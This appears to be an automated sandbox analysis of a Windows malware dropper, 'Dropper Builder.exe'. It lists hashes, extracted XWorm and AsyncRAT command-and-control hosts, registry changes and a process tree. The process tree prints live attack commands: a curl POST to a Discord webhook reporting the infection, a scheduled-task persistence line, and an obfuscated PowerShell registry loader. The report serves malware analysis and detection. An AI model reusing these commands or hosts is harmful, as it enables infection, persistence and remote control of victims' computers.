Analysis
-
max time kernel
149s -
max time network
3s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 05:51
Static task
static1
Behavioral task
behavioral1
Sample
Dropper Builder.exe
Resource
win7-20240220-en
General
-
Target
Dropper Builder.exe
-
Size
18.6MB
-
MD5
c660fd4addbfaa81fac0a1f5d39cd000
-
SHA1
7d1aaa224037b1ade30bb951ee04989b73d71a81
-
SHA256
7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8
-
SHA512
a53d1608adb02d2b7ad7109490e1dce4b073cf622a291b52cea8794ba3c0296248fa87fb8305893cfb65d44f500afc7057375368eff2fd0a2e872a6420e8d5c9
-
SSDEEP
98304:c+R1sVuWzOYBvDdXCxGSQjJQaoyqUIIdZicEMtECV:ckCzFvDdXCcSQLbqUISpEMW
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral1/memory/2640-11-0x0000000001170000-0x0000000001182000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2860 created 436 2860 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Executes dropped EXE 7 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exe$77-aachost.exe$77-sdchost.exe$77-penisballs.exepid process 2640 $77-sdchost.exe 2696 $77-aachost.exe 2764 $77-penisballs.exe 2680 $77-install.exe 1556 $77-aachost.exe 2600 $77-sdchost.exe 2164 $77-penisballs.exe -
Loads dropped DLL 4 IoCs
Processes:
Dropper Builder.exepid process 2100 Dropper Builder.exe 2100 Dropper Builder.exe 2100 Dropper Builder.exe 2100 Dropper Builder.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.EXE$77-penisballs.exe$77-sdchost.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2860 set thread context of 1452 2860 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 23 IoCs
Processes:
dllhost.exe$77-sdchost.exepowershell.EXE$77-aachost.exe$77-penisballs.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1A0391BF-9564-4294-B0A4-06C298929EF9} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-sdchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" $77-sdchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1095054768c4da01 powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dllhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000070387a4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\ntshrui.dll,-103 = "S&hare with" dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF = 010000000000000030fb7e4768c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 $77-aachost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 $77-penisballs.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" $77-sdchost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.EXEdllhost.exepid process 2860 powershell.EXE 2860 powershell.EXE 1452 dllhost.exe 1452 dllhost.exe 1452 dllhost.exe 1452 dllhost.exe 1452 dllhost.exe 1452 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXEdllhost.exe$77-sdchost.exe$77-penisballs.exedescription pid process Token: SeDebugPrivilege 2640 $77-sdchost.exe Token: SeDebugPrivilege 2764 $77-penisballs.exe Token: SeDebugPrivilege 2860 powershell.EXE Token: SeDebugPrivilege 2860 powershell.EXE Token: SeDebugPrivilege 1452 dllhost.exe Token: SeDebugPrivilege 2600 $77-sdchost.exe Token: SeDebugPrivilege 2164 $77-penisballs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper Builder.exetaskeng.exepowershell.EXEdllhost.exedescription pid process target process PID 2100 wrote to memory of 2512 2100 Dropper Builder.exe cmd.exe PID 2100 wrote to memory of 2512 2100 Dropper Builder.exe cmd.exe PID 2100 wrote to memory of 2512 2100 Dropper Builder.exe cmd.exe PID 2100 wrote to memory of 2512 2100 Dropper Builder.exe cmd.exe PID 2100 wrote to memory of 2640 2100 Dropper Builder.exe $77-sdchost.exe PID 2100 wrote to memory of 2640 2100 Dropper Builder.exe $77-sdchost.exe PID 2100 wrote to memory of 2640 2100 Dropper Builder.exe $77-sdchost.exe PID 2100 wrote to memory of 2640 2100 Dropper Builder.exe $77-sdchost.exe PID 2100 wrote to memory of 2696 2100 Dropper Builder.exe $77-aachost.exe PID 2100 wrote to memory of 2696 2100 Dropper Builder.exe $77-aachost.exe PID 2100 wrote to memory of 2696 2100 Dropper Builder.exe $77-aachost.exe PID 2100 wrote to memory of 2696 2100 Dropper Builder.exe $77-aachost.exe PID 2100 wrote to memory of 2764 2100 Dropper Builder.exe $77-penisballs.exe PID 2100 wrote to memory of 2764 2100 Dropper Builder.exe $77-penisballs.exe PID 2100 wrote to memory of 2764 2100 Dropper Builder.exe $77-penisballs.exe PID 2100 wrote to memory of 2764 2100 Dropper Builder.exe $77-penisballs.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2100 wrote to memory of 2680 2100 Dropper Builder.exe $77-install.exe PID 2452 wrote to memory of 2860 2452 taskeng.exe powershell.EXE PID 2452 wrote to memory of 2860 2452 taskeng.exe powershell.EXE PID 2452 wrote to memory of 2860 2452 taskeng.exe powershell.EXE PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 2860 wrote to memory of 1452 2860 powershell.EXE dllhost.exe PID 1452 wrote to memory of 436 1452 dllhost.exe winlogon.exe PID 1452 wrote to memory of 2600 1452 dllhost.exe $77-sdchost.exe PID 1452 wrote to memory of 2600 1452 dllhost.exe $77-sdchost.exe PID 1452 wrote to memory of 2600 1452 dllhost.exe $77-sdchost.exe PID 1452 wrote to memory of 1556 1452 dllhost.exe $77-aachost.exe PID 1452 wrote to memory of 1556 1452 dllhost.exe $77-aachost.exe PID 1452 wrote to memory of 1556 1452 dllhost.exe $77-aachost.exe PID 1452 wrote to memory of 2164 1452 dllhost.exe $77-penisballs.exe PID 1452 wrote to memory of 2164 1452 dllhost.exe $77-penisballs.exe PID 1452 wrote to memory of 2164 1452 dllhost.exe $77-penisballs.exe PID 1452 wrote to memory of 480 1452 dllhost.exe services.exe PID 1452 wrote to memory of 496 1452 dllhost.exe lsass.exe PID 1452 wrote to memory of 504 1452 dllhost.exe lsm.exe PID 1452 wrote to memory of 596 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 676 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 764 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 808 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 852 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 964 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 108 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 1036 1452 dllhost.exe spoolsv.exe PID 1452 wrote to memory of 1060 1452 dllhost.exe taskhost.exe PID 1452 wrote to memory of 1116 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 1152 1452 dllhost.exe Dwm.exe PID 1452 wrote to memory of 1188 1452 dllhost.exe Explorer.EXE PID 1452 wrote to memory of 3008 1452 dllhost.exe svchost.exe PID 1452 wrote to memory of 1940 1452 dllhost.exe sppsvc.exe PID 1452 wrote to memory of 2100 1452 dllhost.exe Dropper Builder.exe PID 1452 wrote to memory of 2072 1452 dllhost.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{daab0e6c-6a8d-4eda-b12e-9f83114d2cb3}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {8BB70116-71DD-4957-97E3-AA92E9FF9BF5} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"C:\Users\Admin\AppData\Local\Temp\Dropper Builder.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15327495092059029896608600068-1704279424-499724045-312915142-1734203391-623858314"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
memory/436-65-0x00000000373E0000-0x00000000373F0000-memory.dmpFilesize
64KB
-
memory/436-57-0x0000000000420000-0x000000000044B000-memory.dmpFilesize
172KB
-
memory/436-53-0x00000000003F0000-0x0000000000415000-memory.dmpFilesize
148KB
-
memory/436-63-0x0000000000420000-0x000000000044B000-memory.dmpFilesize
172KB
-
memory/436-64-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/436-51-0x00000000003F0000-0x0000000000415000-memory.dmpFilesize
148KB
-
memory/436-54-0x0000000000420000-0x000000000044B000-memory.dmpFilesize
172KB
-
memory/480-78-0x0000000000CE0000-0x0000000000D0B000-memory.dmpFilesize
172KB
-
memory/480-80-0x00000000373E0000-0x00000000373F0000-memory.dmpFilesize
64KB
-
memory/480-79-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/480-72-0x0000000000CE0000-0x0000000000D0B000-memory.dmpFilesize
172KB
-
memory/496-86-0x0000000000990000-0x00000000009BB000-memory.dmpFilesize
172KB
-
memory/496-92-0x0000000000990000-0x00000000009BB000-memory.dmpFilesize
172KB
-
memory/496-93-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/496-94-0x00000000373E0000-0x00000000373F0000-memory.dmpFilesize
64KB
-
memory/504-100-0x0000000000480000-0x00000000004AB000-memory.dmpFilesize
172KB
-
memory/1452-46-0x00000000773A0000-0x0000000077549000-memory.dmpFilesize
1.7MB
-
memory/1452-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1452-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1452-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1452-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1452-48-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1452-47-0x0000000077280000-0x000000007739F000-memory.dmpFilesize
1.1MB
-
memory/1452-41-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2100-0-0x00000000745AE000-0x00000000745AF000-memory.dmpFilesize
4KB
-
memory/2100-1-0x0000000000E30000-0x00000000020D0000-memory.dmpFilesize
18.6MB
-
memory/2640-11-0x0000000001170000-0x0000000001182000-memory.dmpFilesize
72KB
-
memory/2696-19-0x0000000000F10000-0x0000000000F26000-memory.dmpFilesize
88KB
-
memory/2764-33-0x00000000001C0000-0x00000000001C6000-memory.dmpFilesize
24KB
-
memory/2764-27-0x0000000001030000-0x0000000001076000-memory.dmpFilesize
280KB
-
memory/2860-39-0x0000000077280000-0x000000007739F000-memory.dmpFilesize
1.1MB
-
memory/2860-35-0x0000000019FD0000-0x000000001A2B2000-memory.dmpFilesize
2.9MB
-
memory/2860-36-0x0000000000DB0000-0x0000000000DB8000-memory.dmpFilesize
32KB
-
memory/2860-37-0x0000000001540000-0x000000000156A000-memory.dmpFilesize
168KB
-
memory/2860-38-0x00000000773A0000-0x0000000077549000-memory.dmpFilesize
1.7MB